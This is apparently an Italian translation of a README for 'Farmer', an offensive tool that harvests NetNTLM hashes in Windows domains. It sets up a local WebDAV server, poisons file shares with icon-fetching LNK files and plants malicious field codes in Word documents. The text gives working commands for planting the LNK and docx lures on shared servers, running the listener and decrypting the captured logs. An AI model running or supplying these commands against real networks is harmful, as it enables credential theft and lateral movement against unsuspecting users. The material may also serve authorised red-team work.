
Raccoglie hash NetNTLM in domini Windows tramite un server WebDAV locale, con avvelenamento di file LNK e iniezione di codice nei campi dei documenti Office per movimento laterale e cattura di credenziali.
Autore: @domchell
Volevo fare il contadino, così ho iniziato a raccogliere hash
Farmer è un progetto per la raccolta di hash NetNTLM in un dominio Windows. Farmer lo realizza creando un server WebDAV locale che induce il WebDAV Mini Redirector a autenticare i client che si connettono.
Affinché Farmer abbia successo, i client DEVONO essere in grado di connettersi al server WebDAV locale. Possibili ostacoli includono la segmentazione di rete e/o il firewall di Windows. Assicurati di verificare questi aspetti prima (suggerimento Seatbelt WindowsFirewall).
Farmer include un sottomodulo per lo strumento Crop, che può essere utilizzato per creare file LNK che avviano una connessione WebDAV quando si sfoglia una cartella in cui è archiviato il LNK, poiché tenterà di renderizzare l'icona memorizzata.
Il concetto dell'attacco è: dovresti usare Crop per avvelenare le condivisioni file desiderate con il file LNK che punta al server WebDAV di Farmer.
Per esempio:
crop.exe \\fileserver\Common crop.lnk \\workstation@8888\harvest \\workstation@8888\harvest
Quando un qualsiasi utente sfoglia \fileserver\Common, explorer tenterà di recuperare l'icona dal server WebDAV di Farmer e, così facendo, invierà l'hash NetNTLM dell'utente.
Farmer include un altro sottomodulo per lo strumento Fertiliser, che può essere utilizzato per avvelenare documenti Office (attualmente solo docx) con un codice di campo malevolo. Ciò fa sì che il codice di campo venga analizzato quando il documento viene aperto e farà trapelare l'hash al server WebDAV di tua scelta :)
Per esempio:
Fertiliser.exe \\fileserver\important.docx http://workstation:8888/foo "Update required"
Farmer ascolterà su una porta definita dall'utente, per un certo numero di secondi, e scriverà l'output sul filesystem se necessario:
Utilizzo:
farmer.exe <port> [seconds] [output]
Se non viene specificato alcun numero di secondi, o è impostato a 0, farmer verrà eseguito a tempo indeterminato, per esempio:
farmer.exe 8888 0 c:\windows\temp\test.tmp
Per eseguire farmer per un minuto sulla porta 8888, procedere come segue:
farmer.exe 8888 60
Se desideri scrivere il log di Farmer sul filesystem, puoi crittografare il file di log con AES utilizzando la chiave impostata in Config.key e impostando il booleano encrypt su true (default false).
Il file di log può essere decrittografato con lo strumento HarvestCrop, per esempio:
harvestcrop.exe c:\windows\temp\test.tmp farmer